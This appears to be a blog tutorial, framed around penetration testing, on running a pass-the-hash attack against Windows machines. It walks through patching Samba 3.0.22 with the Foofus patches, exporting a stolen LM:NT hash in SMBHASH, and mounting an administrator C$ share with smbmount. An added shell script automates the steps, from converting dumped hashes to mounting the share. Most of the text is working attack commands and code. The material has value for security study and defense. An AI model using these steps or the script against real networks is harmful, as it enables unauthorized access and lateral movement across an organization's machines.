Say you were conducting a penetration test on Company X and you were unable to crack the administrator password. Now, like most organizations, Company X uses the same local administrator password on all of its machines, so gaining access to this password would let you pwn the entire network. Now let's say that Company X believes strongly in security and uses a random 20-character administrator password. So now you're screwed, right? Wrong.
By compromising just one machine that holds this master account (the local administrator account in this example), you can dump its password hash and use a pass-the-hash attack, 'passing' the hash itself to every other machine on the network. You never need the plaintext: in NTLM authentication the NT hash is the secret the client uses to compute its challenge-response, so a client that knows the hash proves exactly as much as one that knows the password, and Windows grants it access to the host. Password length and complexity are irrelevant here. Kinda cool, huh?
Now that I've given you some background, here's how you go about setting it up on Backtrack 4. There are a few tweaks that need to be made in order for this to work on Backtrack 4, because the pass-the-hash support comes from the Foofus patches against an older Samba (3.0.22) rather than the Samba that ships with the distribution.
Pass the Hash Attack Tutorial for Backtrack 4 Users:
1. Download Samba 3.0.22:
2. Download both of the Foofus Samba patches:
3. Extract the Samba archive where you would like to access Samba from. I've chosen /opt/, which gives you /opt/samba-3.0.22/
4. From the directory where you extracted Samba (/opt/ for me), apply both patches. They are written relative to that directory, which is why -p0 is used
# cd /opt/
# patch -p0 <samba-3.0.22-add-user.patch
# patch -p0 <samba-3.0.22-passhash.patch
5. Configure Samba with smbmount
# cd /opt/samba-3.0.22/source
# ./configure --with-smbmount
6. Compile/Install Samba (still in the /opt/samba-3.0.22/source/ directory)
# make
# make install
7. Create a mount point in order to mount the Windows share
# mkdir /mnt/target
8. Alter the fstab file to allow /mnt/target to be mounted
# pico /etc/fstab
At the bottom of the file add this entry:
none /mnt/target tmpfs defaults 0 0
9. Copy smb.conf to the correct directory
# cp /opt/samba-3.0.22/packaging/Debian/debian-woody/smb.conf /usr/local/samba/lib/smb.conf
10. Mount the target directory
# mount /mnt/target
11. Add your compromised hash to the SMBHASH environment variable
# export SMBHASH="92D887C9910492C3254E2DF489A880E4:7A2EDE4F51B94203984C6BA21239CF63"
Note: The format for this is "LMHASH:NTHASH", each half being exactly 32 hex characters. If the LM hash was never stored on the victim (pwdump-style tools print a placeholder instead of a hash), put the well-known empty-LM value AAD3B435B51404EEAAD3B435B51404EE in the first half; the NT hash is what actually matters.
12. Implement your pass-the-hash attack
# cd /opt/samba-3.0.22/source/bin
Usage: smbmount //target-ipaddress/sharename /mount/point -o username=username-associated-with-hash-here
# ./smbmount //10.0.0.100/C$ /mnt/target -o username=administrator
13. Type an arbitrary password
At this point you will be asked to supply a password. Type anything you want here, just make sure it's not blank; for example, type 'blah' and hit return. The hash in SMBHASH is what is actually used to authenticate.
14. Check to see that you have successfully mapped the Windows share
# ls /mnt/target
If the mount fails, first check that SMBHASH is exported in the shell you are running smbmount from and that both halves are 32 hex characters; a typo in the hash looks exactly like a wrong password to the target.
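Steps 11 through 14 are easy to get wrong by hand, mostly in the SMBHASH format. The script below is an added example and is not part of the original tutorial or the Foofus patches: it takes a pwdump/fgdump-style line (user:rid:LMHASH:NTHASH:::, an assumed input format), turns it into the LMHASH:NTHASH string SMBHASH expects, substitutes the empty-LM value when the dump shows no LM hash, validates the result, and then runs the patched smbmount. The smbmount path, the constructed sample hashes, and passing the dummy password via the password= mount option instead of typing it (assumed to behave the same way as the interactive prompt) are all assumptions.

```shell
#!/bin/sh
# Added helper for the patched-Samba pass-the-hash procedure (not from the original post).
# Assumed: hashes arrive as pwdump/fgdump-style lines  user:rid:LMHASH:NTHASH:::
# and smbmount lives where the tutorial built it.

EMPTY_LM="AAD3B435B51404EEAAD3B435B51404EE"   # LM hash of the empty password; used when LM storage is disabled
SMBMOUNT="${SMBMOUNT:-/opt/samba-3.0.22/source/bin/smbmount}"   # assumed path, override via env

# is_hex32 STRING -> success if STRING is exactly 32 hex characters
is_hex32() {
    case "$1" in
        *[!0-9A-Fa-f]*) return 1 ;;
    esac
    [ "${#1}" -eq 32 ]
}

# validate_smbhash LM:NT -> success if the value has the exact shape SMBHASH needs
validate_smbhash() {
    lm="${1%%:*}"
    nt="${1#*:}"
    [ "$lm" != "$1" ] || return 1            # no colon at all
    case "$nt" in *:*) return 1 ;; esac      # more than one colon
    is_hex32 "$lm" && is_hex32 "$nt"
}

# pwdump_to_smbhash 'user:rid:LM:NT:::' -> prints LM:NT in upper case, or fails
pwdump_to_smbhash() {
    line="$1"
    user=$(printf '%s' "$line" | cut -d: -f1)
    lm=$(printf '%s' "$line" | cut -d: -f3 | tr 'a-f' 'A-F')
    nt=$(printf '%s' "$line" | cut -d: -f4 | tr 'a-f' 'A-F')
    # Dump tools print a placeholder (e.g. "NO PASSWORD*****...") when no LM hash is stored.
    # SMBHASH still needs a 32-hex LM field, so fall back to the empty-LM value.
    if ! is_hex32 "$lm"; then
        lm="$EMPTY_LM"
    fi
    # The NT hash is the real credential; without a valid one there is nothing to pass.
    if ! is_hex32 "$nt"; then
        printf 'bad NT hash for user %s\n' "$user" >&2
        return 1
    fi
    printf '%s:%s\n' "$lm" "$nt"
}

# pth_mount TARGET SHARE MOUNTPOINT USERNAME 'user:rid:LM:NT:::'
# Exports SMBHASH (step 11) and runs smbmount (step 12). The non-blank dummy
# password from step 13 is supplied with the password= option (assumed equivalent
# to typing it at the prompt); the patched smbmount authenticates with SMBHASH.
pth_mount() {
    target="$1"; share="$2"; mnt="$3"; user="$4"; dumpline="$5"
    SMBHASH=$(pwdump_to_smbhash "$dumpline") || return 1
    validate_smbhash "$SMBHASH" || return 1
    export SMBHASH
    "$SMBMOUNT" "//$target/$share" "$mnt" -o "username=$user,password=blah" \
        && ls "$mnt"                         # step 14: confirm the share is mapped
}

# Example invocation (constructed sample hash, not a real credential):
# pth_mount 10.0.0.100 'C$' /mnt/target administrator \
#     'Administrator:500:92D887C9910492C3254E2DF489A880E4:7A2EDE4F51B94203984C6BA21239CF63:::'
```

Only pth_mount touches the network; the conversion and validation functions can be run on their own against a dump file before you start mounting shares, which catches the mixed-case, truncated or placeholder hashes that otherwise show up as a mysterious authentication failure.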
If you would like a video tutorial on the pass-the-hash technique, please see John Strand's video: